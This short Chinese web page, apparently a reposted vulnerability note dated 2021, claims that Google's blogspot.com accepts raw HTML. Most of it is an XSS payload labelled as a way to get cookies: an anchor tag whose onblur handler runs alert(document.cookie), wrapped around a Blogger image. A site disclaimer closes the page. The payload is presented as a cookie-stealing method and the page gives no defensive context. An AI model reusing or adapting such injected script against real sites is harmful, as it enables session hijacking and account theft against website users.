Google的博客blogspot.com窃取cookie漏洞

时间:2021-05-25

Google的博客blogspot.com站点.
支持html,然后可以在其中插入类似如下内容.获取cookie

<a onblur="javascript:alert(document.cookie)" href="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s1600-h/5af1scd.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s200/5af1scd.jpg" alt="" id="BLOGGER_PHOTO_ID_5101217197124729042" border="0" /></a>

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章